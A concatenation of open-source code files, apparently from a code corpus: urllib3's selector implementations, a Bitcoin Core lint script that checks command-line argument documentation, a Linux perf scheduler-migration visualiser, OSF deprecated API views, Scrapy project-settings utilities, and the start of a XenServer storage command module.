def _syscall_wrapper(func, recalc_timeout, *args, **kwargs):
""" Wrapper function for syscalls that could fail due to EINTR.
All functions should be retried if there is time left in the timeout
in accordance with PEP 475. """
timeout = kwargs.get("timeout", None)
if timeout is None:
expires = None
recalc_timeout = False
else:
timeout = float(timeout)
if timeout < 0.0: # Timeout less than 0 treated as no timeout.
expires = None
else:
expires = monotonic() + timeout
args = list(args)
if recalc_timeout and "timeout" not in kwargs:
raise ValueError(
"Timeout must be in args or kwargs to be recalculated")
result = _SYSCALL_SENTINEL
while result is _SYSCALL_SENTINEL:
try:
result = func(*args, **kwargs)
# OSError is thrown by select.select
# IOError is thrown by select.epoll.poll
# select.error is thrown by select.poll.poll
# Aren't we thankful for Python 3.x rework for exceptions?
except (OSError, IOError, select.error) as e:
# select.error wasn't a subclass of OSError in the past.
errcode = None
if hasattr(e, "errno"):
errcode = e.errno
elif hasattr(e, "args"):
errcode = e.args[0]
# Also test for the Windows equivalent of EINTR.
is_interrupt = (errcode == errno.EINTR or (hasattr(errno, "WSAEINTR") and
errcode == errno.WSAEINTR))
if is_interrupt:
if expires is not None:
current_time = monotonic()
if current_time > expires:
                            # OSError takes no errno= keyword; pass it positionally.
                            raise OSError(errno.ETIMEDOUT, "Connection timed out")
if recalc_timeout:
if "timeout" in kwargs:
kwargs["timeout"] = expires - current_time
continue
if errcode:
raise SelectorError(errcode)
else:
raise
return result
SelectorKey = namedtuple('SelectorKey', ['fileobj', 'fd', 'events', 'data'])
class _SelectorMapping(Mapping):
""" Mapping of file objects to selector keys """
def __init__(self, selector):
self._selector = selector
def __len__(self):
return len(self._selector._fd_to_key)
def __getitem__(self, fileobj):
try:
fd = self._selector._fileobj_lookup(fileobj)
return self._selector._fd_to_key[fd]
except KeyError:
raise KeyError("{0!r} is not registered.".format(fileobj))
def __iter__(self):
return iter(self._selector._fd_to_key)
class BaseSelector(object):
""" Abstract Selector class
A selector supports registering file objects to be monitored
for specific I/O events.
A file object is a file descriptor or any object with a
`fileno()` method. An arbitrary object can be attached to the
file object which can be used for example to store context info,
a callback, etc.
A selector can use various implementations (select(), poll(), epoll(),
and kqueue()) depending on the platform. The 'DefaultSelector' class uses
the most efficient implementation for the current platform.
"""
def __init__(self):
# Maps file descriptors to keys.
self._fd_to_key = {}
# Read-only mapping returned by get_map()
self._map = _SelectorMapping(self)
def _fileobj_lookup(self, fileobj):
""" Return a file descriptor from a file object.
This wraps _fileobj_to_fd() to do an exhaustive
search in case the object is invalid but we still
have it in our map. Used by unregister() so we can
unregister an object that was previously registered
even if it is closed. It is also used by _SelectorMapping
"""
try:
return _fileobj_to_fd(fileobj)
except ValueError:
# Search through all our mapped keys.
for key in self._fd_to_key.values():
if key.fileobj is fileobj:
return key.fd
# Raise ValueError after all.
raise
def register(self, fileobj, events, data=None):
""" Register a file object for a set of events to monitor. """
if (not events) or (events & ~(EVENT_READ | EVENT_WRITE)):
raise ValueError("Invalid events: {0!r}".format(events))
key = SelectorKey(fileobj, self._fileobj_lookup(fileobj), events, data)
if key.fd in self._fd_to_key:
raise KeyError("{0!r} (FD {1}) is already registered"
.format(fileobj, key.fd))
self._fd_to_key[key.fd] = key
return key
def unregister(self, fileobj):
""" Unregister a file object from being monitored. """
try:
key = self._fd_to_key.pop(self._fileobj_lookup(fileobj))
except KeyError:
raise KeyError("{0!r} is not registered".format(fileobj))
# Getting the fileno of a closed socket on Windows errors with EBADF.
except socket.error as e: # Platform-specific: Windows.
if e.errno != errno.EBADF:
raise
else:
for key in self._fd_to_key.values():
if key.fileobj is fileobj:
self._fd_to_key.pop(key.fd)
break
else:
raise KeyError("{0!r} is not registered".format(fileobj))
return key
def modify(self, fileobj, events, data=None):
""" Change a registered file object monitored events and data. """
# NOTE: Some subclasses optimize this operation even further.
try:
key = self._fd_to_key[self._fileobj_lookup(fileobj)]
except KeyError:
raise KeyError("{0!r} is not registered".format(fileobj))
if events != key.events:
self.unregister(fileobj)
key = self.register(fileobj, events, data)
elif data != key.data:
# Use a shortcut to update the data.
key = key._replace(data=data)
self._fd_to_key[key.fd] = key
return key
def select(self, timeout=None):
""" Perform the actual selection until some monitored file objects
are ready or the timeout expires. """
raise NotImplementedError()
def close(self):
""" Close the selector. This must be called to ensure that all
underlying resources are freed. """
self._fd_to_key.clear()
self._map = None
def get_key(self, fileobj):
""" Return the key associated with a registered file object. """
mapping = self.get_map()
if mapping is None:
raise RuntimeError("Selector is closed")
try:
return mapping[fileobj]
except KeyError:
raise KeyError("{0!r} is not registered".format(fileobj))
def get_map(self):
""" Return a mapping of file objects to selector keys """
return self._map
def _key_from_fd(self, fd):
""" Return the key associated to a given file descriptor
Return None if it is not found. """
try:
return self._fd_to_key[fd]
except KeyError:
return None
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
# Almost all platforms have select.select()
if hasattr(select, "select"):
class SelectSelector(BaseSelector):
""" Select-based selector. """
def __init__(self):
super(SelectSelector, self).__init__()
self._readers = set()
self._writers = set()
def register(self, fileobj, events, data=None):
key = super(SelectSelector, self).register(fileobj, events, data)
if events & EVENT_READ:
self._readers.add(key.fd)
if events & EVENT_WRITE:
self._writers.add(key.fd)
return key
def unregister(self, fileobj):
key = super(SelectSelector, self).unregister(fileobj)
self._readers.discard(key.fd)
self._writers.discard(key.fd)
return key
def _select(self, r, w, timeout=None):
""" Wrapper for select.select because timeout is a positional arg """
return select.select(r, w, [], timeout)
def select(self, timeout=None):
# Selecting on empty lists on Windows errors out.
if not len(self._readers) and not len(self._writers):
return []
timeout = None if timeout is None else max(timeout, 0.0)
ready = []
r, w, _ = _syscall_wrapper(self._select, True, self._readers,
self._writers, timeout)
r = set(r)
w = set(w)
for fd in r | w:
events = 0
if fd in r:
events |= EVENT_READ
if fd in w:
events |= EVENT_WRITE
key = self._key_from_fd(fd)
if key:
ready.append((key, events & key.events))
return ready
if hasattr(select, "poll"):
class PollSelector(BaseSelector):
""" Poll-based selector """
def __init__(self):
super(PollSelector, self).__init__()
self._poll = select.poll()
def register(self, fileobj, events, data=None):
key = super(PollSelector, self).register(fileobj, events, data)
event_mask = 0
if events & EVENT_READ:
event_mask |= select.POLLIN
if events & EVENT_WRITE:
event_mask |= select.POLLOUT
self._poll.register(key.fd, event_mask)
return key
def unregister(self, fileobj):
key = super(PollSelector, self).unregister(fileobj)
self._poll.unregister(key.fd)
return key
def _wrap_poll(self, timeout=None):
""" Wrapper function for select.poll.poll() so that
_syscall_wrapper can work with only seconds. """
if timeout is not None:
if timeout <= 0:
timeout = 0
else:
# select.poll.poll() has a resolution of 1 millisecond,
# round away from zero to wait *at least* timeout seconds.
timeout = math.ceil(timeout * 1e3)
result = self._poll.poll(timeout)
return result
def select(self, timeout=None):
ready = []
fd_events = _syscall_wrapper(self._wrap_poll, True, timeout=timeout)
for fd, event_mask in fd_events:
events = 0
if event_mask & ~select.POLLIN:
events |= EVENT_WRITE
if event_mask & ~select.POLLOUT:
events |= EVENT_READ
key = self._key_from_fd(fd)
if key:
ready.append((key, events & key.events))
return ready
if hasattr(select, "epoll"):
class EpollSelector(BaseSelector):
""" Epoll-based selector """
def __init__(self):
super(EpollSelector, self).__init__()
self._epoll = select.epoll()
def fileno(self):
return self._epoll.fileno()
def register(self, fileobj, events, data=None):
key = super(EpollSelector, self).register(fileobj, events, data)
events_mask = 0
if events & EVENT_READ:
events_mask |= select.EPOLLIN
if events & EVENT_WRITE:
events_mask |= select.EPOLLOUT
_syscall_wrapper(self._epoll.register, False, key.fd, events_mask)
return key
def unregister(self, fileobj):
key = super(EpollSelector, self).unregister(fileobj)
try:
_syscall_wrapper(self._epoll.unregister, False, key.fd)
except SelectorError:
# This can occur when the fd was closed since registry.
pass
return key
def select(self, timeout=None):
if timeout is not None:
if timeout <= 0:
timeout = 0.0
else:
# select.epoll.poll() has a resolution of 1 millisecond
# but luckily takes seconds so we don't need a wrapper
# like PollSelector. Just for better rounding.
timeout = math.ceil(timeout * 1e3) * 1e-3
timeout = float(timeout)
else:
timeout = -1.0 # epoll.poll() must have a float.
# We always want at least 1 to ensure that select can be called
            # with no file descriptors registered. Otherwise it will fail.
max_events = max(len(self._fd_to_key), 1)
ready = []
fd_events = _syscall_wrapper(self._epoll.poll, True,
timeout=timeout,
maxevents=max_events)
for fd, event_mask in fd_events:
events = 0
if event_mask & ~select.EPOLLIN:
events |= EVENT_WRITE
if event_mask & ~select.EPOLLOUT:
events |= EVENT_READ
key = self._key_from_fd(fd)
if key:
ready.append((key, events & key.events))
return ready
def close(self):
self._epoll.close()
super(EpollSelector, self).close()
if hasattr(select, "kqueue"):
class KqueueSelector(BaseSelector):
""" Kqueue / Kevent-based selector """
def __init__(self):
super(KqueueSelector, self).__init__()
self._kqueue = select.kqueue()
def fileno(self):
return self._kqueue.fileno()
def register(self, fileobj, events, data=None):
key = super(KqueueSelector, self).register(fileobj, events, data)
if events & EVENT_READ:
kevent = select.kevent(key.fd,
select.KQ_FILTER_READ,
select.KQ_EV_ADD)
_syscall_wrapper(self._kqueue.control, False, [kevent], 0, 0)
if events & EVENT_WRITE:
kevent = select.kevent(key.fd,
select.KQ_FILTER_WRITE,
select.KQ_EV_ADD)
_syscall_wrapper(self._kqueue.control, False, [kevent], 0, 0)
return key
def unregister(self, fileobj):
key = super(KqueueSelector, self).unregister(fileobj)
if key.events & EVENT_READ:
kevent = select.kevent(key.fd,
select.KQ_FILTER_READ,
select.KQ_EV_DELETE)
try:
_syscall_wrapper(self._kqueue.control, False, [kevent], 0, 0)
except SelectorError:
pass
if key.events & EVENT_WRITE:
kevent = select.kevent(key.fd,
select.KQ_FILTER_WRITE,
select.KQ_EV_DELETE)
try:
_syscall_wrapper(self._kqueue.control, False, [kevent], 0, 0)
except SelectorError:
pass
return key
def select(self, timeout=None):
if timeout is not None:
timeout = max(timeout, 0)
max_events = len(self._fd_to_key) * 2
ready_fds = {}
kevent_list = _syscall_wrapper(self._kqueue.control, True,
None, max_events, timeout)
for kevent in kevent_list:
fd = kevent.ident
event_mask = kevent.filter
events = 0
if event_mask == select.KQ_FILTER_READ:
events |= EVENT_READ
if event_mask == select.KQ_FILTER_WRITE:
events |= EVENT_WRITE
key = self._key_from_fd(fd)
if key:
if key.fd not in ready_fds:
ready_fds[key.fd] = (key, events & key.events)
else:
old_events = ready_fds[key.fd][1]
ready_fds[key.fd] = (key, (events | old_events) & key.events)
return list(ready_fds.values())
def close(self):
self._kqueue.close()
super(KqueueSelector, self).close()
if not hasattr(select, 'select'): # Platform-specific: AppEngine
HAS_SELECT = False
def _can_allocate(struct):
""" Checks that select structs can be allocated by the underlying
operating system, not just advertised by the select module. We don't
check select() because we'll be hopeful that most platforms that
don't have it available will not advertise it. (ie: GAE) """
try:
# select.poll() objects won't fail until used.
if struct == 'poll':
p = select.poll()
p.poll(0)
# All others will fail on allocation.
else:
getattr(select, struct)().close()
return True
except (OSError, AttributeError) as e:
return False
# Choose the best implementation, roughly:
# kqueue == epoll > poll > select. Devpoll not supported. (See above)
# select() also can't accept a FD > FD_SETSIZE (usually around 1024)
def DefaultSelector():
""" This function serves as a first call for DefaultSelector to
detect if the select module is being monkey-patched incorrectly
by eventlet, greenlet, and preserve proper behavior. """
global _DEFAULT_SELECTOR
if _DEFAULT_SELECTOR is None:
if _can_allocate('kqueue'):
_DEFAULT_SELECTOR = KqueueSelector
elif _can_allocate('epoll'):
_DEFAULT_SELECTOR = EpollSelector
elif _can_allocate('poll'):
_DEFAULT_SELECTOR = PollSelector
elif hasattr(select, 'select'):
_DEFAULT_SELECTOR = SelectSelector
else: # Platform-specific: AppEngine
raise ValueError('Platform does not have a selector')
return _DEFAULT_SELECTOR()
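if __name__ == '__main__':
    # Smoke-test sketch (added for illustration; not part of upstream
    # urllib3). POSIX-only, since it relies on socket.socketpair().
    left, right = socket.socketpair()
    selector = DefaultSelector()
    selector.register(left, EVENT_READ)
    right.send(b"ping")
    for key, events in selector.select(timeout=1.0):
        assert events & EVENT_READ
        print(key.fileobj.recv(4))  # -> 'ping'
    selector.close()
    left.close()
    right.close()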
| mit |
Flowdalic/bitcoin | test/lint/check-doc.py | 1 | 1931 | #!/usr/bin/env python3
# Copyright (c) 2015-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
This checks if all command line args are documented.
Return value is 0 to indicate no error.
Author: @MarcoFalke
'''
from subprocess import check_output
import re
import sys
FOLDER_GREP = 'src'
FOLDER_TEST = 'src/test/'
REGEX_ARG = '(?:ForceSet|SoftSet|Get|Is)(?:Bool)?Args?(?:Set)?\("(-[^"]+)"'
REGEX_DOC = 'AddArg\("(-[^"=]+?)(?:=|")'
CMD_ROOT_DIR = '`git rev-parse --show-toplevel`/{}'.format(FOLDER_GREP)
CMD_GREP_ARGS = r"git grep --perl-regexp '{}' -- {} ':(exclude){}'".format(REGEX_ARG, CMD_ROOT_DIR, FOLDER_TEST)
CMD_GREP_DOCS = r"git grep --perl-regexp '{}' {}".format(REGEX_DOC, CMD_ROOT_DIR)
# list unsupported, deprecated and duplicate args as they need no documentation
SET_DOC_OPTIONAL = set(['-rpcssl', '-benchmark', '-h', '-help', '-socks', '-tor', '-debugnet', '-whitelistalwaysrelay', '-promiscuousmempoolflags', '-blockminsize', '-dbcrashratio', '-forcecompactdb', '-usehd'])
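# For example, REGEX_ARG captures "-daemon" from a C++ call such as
# GetBoolArg("-daemon", false), and REGEX_DOC captures "-daemon" from
# AddArg("-daemon=<n>", ...) (hypothetical snippets; any call matching
# the regexes counts).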
def main():
used = check_output(CMD_GREP_ARGS, shell=True, universal_newlines=True, encoding='utf8')
docd = check_output(CMD_GREP_DOCS, shell=True, universal_newlines=True, encoding='utf8')
args_used = set(re.findall(re.compile(REGEX_ARG), used))
args_docd = set(re.findall(re.compile(REGEX_DOC), docd)).union(SET_DOC_OPTIONAL)
args_need_doc = args_used.difference(args_docd)
args_unknown = args_docd.difference(args_used)
print("Args used : {}".format(len(args_used)))
print("Args documented : {}".format(len(args_docd)))
print("Args undocumented: {}".format(len(args_need_doc)))
print(args_need_doc)
print("Args unknown : {}".format(len(args_unknown)))
print(args_unknown)
sys.exit(len(args_need_doc))
if __name__ == "__main__":
main()
| mit |
skelton/amlogic_common_3050 | tools/perf/scripts/python/sched-migration.py | 11215 | 11670 | #!/usr/bin/python
#
# Cpu task migration overview toy
#
# Copyright (C) 2010 Frederic Weisbecker <[email protected]>
#
# perf script event handlers have been generated by perf script -g python
#
# This software is distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
import os
import sys
from collections import defaultdict
from UserList import UserList
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
sys.path.append('scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from SchedGui import *
threads = { 0 : "idle"}
def thread_name(pid):
return "%s:%d" % (threads[pid], pid)
class RunqueueEventUnknown:
@staticmethod
def color():
return None
def __repr__(self):
return "unknown"
class RunqueueEventSleep:
@staticmethod
def color():
return (0, 0, 0xff)
def __init__(self, sleeper):
self.sleeper = sleeper
def __repr__(self):
return "%s gone to sleep" % thread_name(self.sleeper)
class RunqueueEventWakeup:
@staticmethod
def color():
return (0xff, 0xff, 0)
def __init__(self, wakee):
self.wakee = wakee
def __repr__(self):
return "%s woke up" % thread_name(self.wakee)
class RunqueueEventFork:
@staticmethod
def color():
return (0, 0xff, 0)
def __init__(self, child):
self.child = child
def __repr__(self):
return "new forked task %s" % thread_name(self.child)
class RunqueueMigrateIn:
@staticmethod
def color():
return (0, 0xf0, 0xff)
def __init__(self, new):
self.new = new
def __repr__(self):
return "task migrated in %s" % thread_name(self.new)
class RunqueueMigrateOut:
@staticmethod
def color():
return (0xff, 0, 0xff)
def __init__(self, old):
self.old = old
def __repr__(self):
return "task migrated out %s" % thread_name(self.old)
class RunqueueSnapshot:
def __init__(self, tasks = [0], event = RunqueueEventUnknown()):
self.tasks = tuple(tasks)
self.event = event
def sched_switch(self, prev, prev_state, next):
event = RunqueueEventUnknown()
if taskState(prev_state) == "R" and next in self.tasks \
and prev in self.tasks:
return self
if taskState(prev_state) != "R":
event = RunqueueEventSleep(prev)
next_tasks = list(self.tasks[:])
if prev in self.tasks:
if taskState(prev_state) != "R":
next_tasks.remove(prev)
elif taskState(prev_state) == "R":
next_tasks.append(prev)
if next not in next_tasks:
next_tasks.append(next)
return RunqueueSnapshot(next_tasks, event)
def migrate_out(self, old):
if old not in self.tasks:
return self
next_tasks = [task for task in self.tasks if task != old]
return RunqueueSnapshot(next_tasks, RunqueueMigrateOut(old))
def __migrate_in(self, new, event):
if new in self.tasks:
self.event = event
return self
next_tasks = self.tasks[:] + tuple([new])
return RunqueueSnapshot(next_tasks, event)
def migrate_in(self, new):
return self.__migrate_in(new, RunqueueMigrateIn(new))
def wake_up(self, new):
return self.__migrate_in(new, RunqueueEventWakeup(new))
def wake_up_new(self, new):
return self.__migrate_in(new, RunqueueEventFork(new))
def load(self):
""" Provide the number of tasks on the runqueue.
Don't count idle"""
return len(self.tasks) - 1
def __repr__(self):
ret = self.tasks.__repr__()
                ret += ' ' + self.event.__repr__()  # upstream called the undefined origin_tostring()
return ret
class TimeSlice:
def __init__(self, start, prev):
self.start = start
self.prev = prev
self.end = start
# cpus that triggered the event
self.event_cpus = []
if prev is not None:
self.total_load = prev.total_load
self.rqs = prev.rqs.copy()
else:
self.rqs = defaultdict(RunqueueSnapshot)
self.total_load = 0
def __update_total_load(self, old_rq, new_rq):
diff = new_rq.load() - old_rq.load()
self.total_load += diff
def sched_switch(self, ts_list, prev, prev_state, next, cpu):
old_rq = self.prev.rqs[cpu]
new_rq = old_rq.sched_switch(prev, prev_state, next)
if old_rq is new_rq:
return
self.rqs[cpu] = new_rq
self.__update_total_load(old_rq, new_rq)
ts_list.append(self)
self.event_cpus = [cpu]
def migrate(self, ts_list, new, old_cpu, new_cpu):
if old_cpu == new_cpu:
return
old_rq = self.prev.rqs[old_cpu]
out_rq = old_rq.migrate_out(new)
self.rqs[old_cpu] = out_rq
self.__update_total_load(old_rq, out_rq)
new_rq = self.prev.rqs[new_cpu]
in_rq = new_rq.migrate_in(new)
self.rqs[new_cpu] = in_rq
self.__update_total_load(new_rq, in_rq)
ts_list.append(self)
if old_rq is not out_rq:
self.event_cpus.append(old_cpu)
self.event_cpus.append(new_cpu)
def wake_up(self, ts_list, pid, cpu, fork):
old_rq = self.prev.rqs[cpu]
if fork:
new_rq = old_rq.wake_up_new(pid)
else:
new_rq = old_rq.wake_up(pid)
if new_rq is old_rq:
return
self.rqs[cpu] = new_rq
self.__update_total_load(old_rq, new_rq)
ts_list.append(self)
self.event_cpus = [cpu]
def next(self, t):
self.end = t
return TimeSlice(t, self)
class TimeSliceList(UserList):
def __init__(self, arg = []):
self.data = arg
def get_time_slice(self, ts):
if len(self.data) == 0:
slice = TimeSlice(ts, TimeSlice(-1, None))
else:
slice = self.data[-1].next(ts)
return slice
def find_time_slice(self, ts):
start = 0
end = len(self.data)
found = -1
searching = True
while searching:
if start == end or start == end - 1:
searching = False
i = (end + start) / 2
if self.data[i].start <= ts and self.data[i].end >= ts:
found = i
end = i
continue
if self.data[i].end < ts:
start = i
elif self.data[i].start > ts:
end = i
return found
def set_root_win(self, win):
self.root_win = win
def mouse_down(self, cpu, t):
idx = self.find_time_slice(t)
if idx == -1:
return
ts = self[idx]
rq = ts.rqs[cpu]
raw = "CPU: %d\n" % cpu
raw += "Last event : %s\n" % rq.event.__repr__()
raw += "Timestamp : %d.%06d\n" % (ts.start / (10 ** 9), (ts.start % (10 ** 9)) / 1000)
raw += "Duration : %6d us\n" % ((ts.end - ts.start) / (10 ** 6))
raw += "Load = %d\n" % rq.load()
for t in rq.tasks:
raw += "%s \n" % thread_name(t)
self.root_win.update_summary(raw)
def update_rectangle_cpu(self, slice, cpu):
rq = slice.rqs[cpu]
if slice.total_load != 0:
load_rate = rq.load() / float(slice.total_load)
else:
load_rate = 0
red_power = int(0xff - (0xff * load_rate))
color = (0xff, red_power, red_power)
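                # Worked example (illustrative): a CPU holding half of the
                # total load gives red_power = int(0xff - 0xff * 0.5) = 0x7f,
                # so busier CPUs are drawn with stronger red (less green/blue).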
top_color = None
if cpu in slice.event_cpus:
top_color = rq.event.color()
self.root_win.paint_rectangle_zone(cpu, color, top_color, slice.start, slice.end)
def fill_zone(self, start, end):
i = self.find_time_slice(start)
if i == -1:
return
for i in xrange(i, len(self.data)):
timeslice = self.data[i]
if timeslice.start > end:
return
for cpu in timeslice.rqs:
self.update_rectangle_cpu(timeslice, cpu)
def interval(self):
if len(self.data) == 0:
return (0, 0)
return (self.data[0].start, self.data[-1].end)
def nr_rectangles(self):
last_ts = self.data[-1]
max_cpu = 0
for cpu in last_ts.rqs:
if cpu > max_cpu:
max_cpu = cpu
return max_cpu
class SchedEventProxy:
def __init__(self):
self.current_tsk = defaultdict(lambda : -1)
self.timeslices = TimeSliceList()
def sched_switch(self, headers, prev_comm, prev_pid, prev_prio, prev_state,
next_comm, next_pid, next_prio):
""" Ensure the task we sched out this cpu is really the one
we logged. Otherwise we may have missed traces """
on_cpu_task = self.current_tsk[headers.cpu]
if on_cpu_task != -1 and on_cpu_task != prev_pid:
print "Sched switch event rejected ts: %s cpu: %d prev: %s(%d) next: %s(%d)" % \
(headers.ts_format(), headers.cpu, prev_comm, prev_pid, next_comm, next_pid)
threads[prev_pid] = prev_comm
threads[next_pid] = next_comm
self.current_tsk[headers.cpu] = next_pid
ts = self.timeslices.get_time_slice(headers.ts())
ts.sched_switch(self.timeslices, prev_pid, prev_state, next_pid, headers.cpu)
def migrate(self, headers, pid, prio, orig_cpu, dest_cpu):
ts = self.timeslices.get_time_slice(headers.ts())
ts.migrate(self.timeslices, pid, orig_cpu, dest_cpu)
def wake_up(self, headers, comm, pid, success, target_cpu, fork):
if success == 0:
return
ts = self.timeslices.get_time_slice(headers.ts())
ts.wake_up(self.timeslices, pid, target_cpu, fork)
def trace_begin():
global parser
parser = SchedEventProxy()
def trace_end():
app = wx.App(False)
timeslices = parser.timeslices
frame = RootFrame(timeslices, "Migration")
app.MainLoop()
def sched__sched_stat_runtime(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, runtime, vruntime):
pass
def sched__sched_stat_iowait(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, delay):
pass
def sched__sched_stat_sleep(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, delay):
pass
def sched__sched_stat_wait(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, delay):
pass
def sched__sched_process_fork(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
parent_comm, parent_pid, child_comm, child_pid):
pass
def sched__sched_process_wait(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio):
pass
def sched__sched_process_exit(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio):
pass
def sched__sched_process_free(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio):
pass
def sched__sched_migrate_task(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio, orig_cpu,
dest_cpu):
headers = EventHeaders(common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
parser.migrate(headers, pid, prio, orig_cpu, dest_cpu)
def sched__sched_switch(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
prev_comm, prev_pid, prev_prio, prev_state,
next_comm, next_pid, next_prio):
headers = EventHeaders(common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
parser.sched_switch(headers, prev_comm, prev_pid, prev_prio, prev_state,
next_comm, next_pid, next_prio)
def sched__sched_wakeup_new(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio, success,
target_cpu):
headers = EventHeaders(common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
parser.wake_up(headers, comm, pid, success, target_cpu, 1)
def sched__sched_wakeup(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio, success,
target_cpu):
headers = EventHeaders(common_cpu, common_secs, common_nsecs,
common_pid, common_comm)
parser.wake_up(headers, comm, pid, success, target_cpu, 0)
def sched__sched_wait_task(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid, prio):
pass
def sched__sched_kthread_stop_ret(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
ret):
pass
def sched__sched_kthread_stop(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
comm, pid):
pass
def trace_unhandled(event_name, context, common_cpu, common_secs, common_nsecs,
common_pid, common_comm):
pass
| gpl-2.0 |
Johnetordoff/osf.io | api/metaschemas/views.py | 14 | 1446 | from api.base.views import DeprecatedView
from api.schemas import views
from api.schemas.serializers import DeprecatedMetaSchemaSerializer, DeprecatedRegistrationMetaSchemaSerializer
class DeprecatedRegistrationMetaSchemaList(DeprecatedView, views.RegistrationSchemaList):
max_version = '2.8'
view_category = 'registration-metaschemas'
view_name = 'registration-schema-detail'
serializer_class = DeprecatedRegistrationMetaSchemaSerializer
class DeprecatedRegistrationMetaSchemaDetail(DeprecatedView, views.RegistrationSchemaDetail):
max_version = '2.8'
view_category = 'registration-metaschemas'
view_name = 'registration-schema-detail'
serializer_class = DeprecatedRegistrationMetaSchemaSerializer
class DeprecatedMetaSchemasList(DeprecatedView, views.RegistrationSchemaList):
"""The documentation for this endpoint can be found [here](https://developer.osf.io/#operation/metaschemas_list).
"""
max_version = '2.7'
view_category = 'metaschemas'
view_name = 'metaschema-list'
serializer_class = DeprecatedMetaSchemaSerializer
class DeprecatedMetaSchemaDetail(DeprecatedView, views.RegistrationSchemaDetail):
"""The documentation for this endpoint can be found [here](https://developer.osf.io/#operation/metaschemas_read).
"""
max_version = '2.7'
view_category = 'metaschemas'
view_name = 'metaschema-detail'
serializer_class = DeprecatedMetaSchemaSerializer
| apache-2.0 |
kalessin/scrapy | scrapy/utils/project.py | 142 | 2491 | import os
from six.moves import cPickle as pickle
import warnings
from importlib import import_module
from os.path import join, dirname, abspath, isabs, exists
from scrapy.utils.conf import closest_scrapy_cfg, get_config, init_env
from scrapy.settings import Settings
from scrapy.exceptions import NotConfigured
ENVVAR = 'SCRAPY_SETTINGS_MODULE'
DATADIR_CFG_SECTION = 'datadir'
def inside_project():
scrapy_module = os.environ.get('SCRAPY_SETTINGS_MODULE')
if scrapy_module is not None:
try:
import_module(scrapy_module)
except ImportError as exc:
warnings.warn("Cannot import scrapy settings module %s: %s" % (scrapy_module, exc))
else:
return True
return bool(closest_scrapy_cfg())
def project_data_dir(project='default'):
"""Return the current project data dir, creating it if it doesn't exist"""
if not inside_project():
raise NotConfigured("Not inside a project")
cfg = get_config()
if cfg.has_option(DATADIR_CFG_SECTION, project):
d = cfg.get(DATADIR_CFG_SECTION, project)
else:
scrapy_cfg = closest_scrapy_cfg()
if not scrapy_cfg:
raise NotConfigured("Unable to find scrapy.cfg file to infer project data dir")
d = abspath(join(dirname(scrapy_cfg), '.scrapy'))
if not exists(d):
os.makedirs(d)
return d
def data_path(path, createdir=False):
"""If path is relative, return the given path inside the project data dir,
otherwise return the path unmodified
"""
if not isabs(path):
path = join(project_data_dir(), path)
if createdir and not exists(path):
os.makedirs(path)
return path
def get_project_settings():
if ENVVAR not in os.environ:
project = os.environ.get('SCRAPY_PROJECT', 'default')
init_env(project)
settings = Settings()
settings_module_path = os.environ.get(ENVVAR)
if settings_module_path:
settings.setmodule(settings_module_path, priority='project')
# XXX: remove this hack
pickled_settings = os.environ.get("SCRAPY_PICKLED_SETTINGS_TO_OVERRIDE")
if pickled_settings:
settings.setdict(pickle.loads(pickled_settings), priority='project')
# XXX: deprecate and remove this functionality
env_overrides = {k[7:]: v for k, v in os.environ.items() if
k.startswith('SCRAPY_')}
if env_overrides:
settings.setdict(env_overrides, priority='project')
return settings
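# Usage sketch (illustrative; not part of this module): a typical call site
# when driving a crawl from a standalone script inside a project, e.g.
#     from scrapy.crawler import CrawlerProcess
#     from scrapy.utils.project import get_project_settings
#     process = CrawlerProcess(get_project_settings())
#     process.crawl('myspider')  # 'myspider' is a hypothetical spider name
#     process.start()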
| bsd-3-clause |
robertbreker/sm | drivers/SRCommand.py | 6 | 14472 | #!/usr/bin/python
#
# Copyright (C) Citrix Systems Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation; version 2.1 only.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# SRCommand: parse SR command-line objects
#
import XenAPI
import sys, errno, syslog
import xs_errors
import xmlrpclib
import SR, VDI, util
import blktap2
import resetvdis
import os
import copy
NEEDS_VDI_OBJECT = [
"vdi_update", "vdi_create", "vdi_delete", "vdi_snapshot", "vdi_clone",
"vdi_resize", "vdi_resize_online", "vdi_attach", "vdi_detach",
"vdi_activate", "vdi_deactivate", "vdi_attach_from_config",
"vdi_generate_config", "vdi_compose",
"vdi_epoch_begin", "vdi_epoch_end" ]
# don't log the commands that spam the log file too much
NO_LOGGING = {
"iso": ["sr_scan"],
"nfs_iso": ["sr_scan"]
}
EXCEPTION_TYPE = {
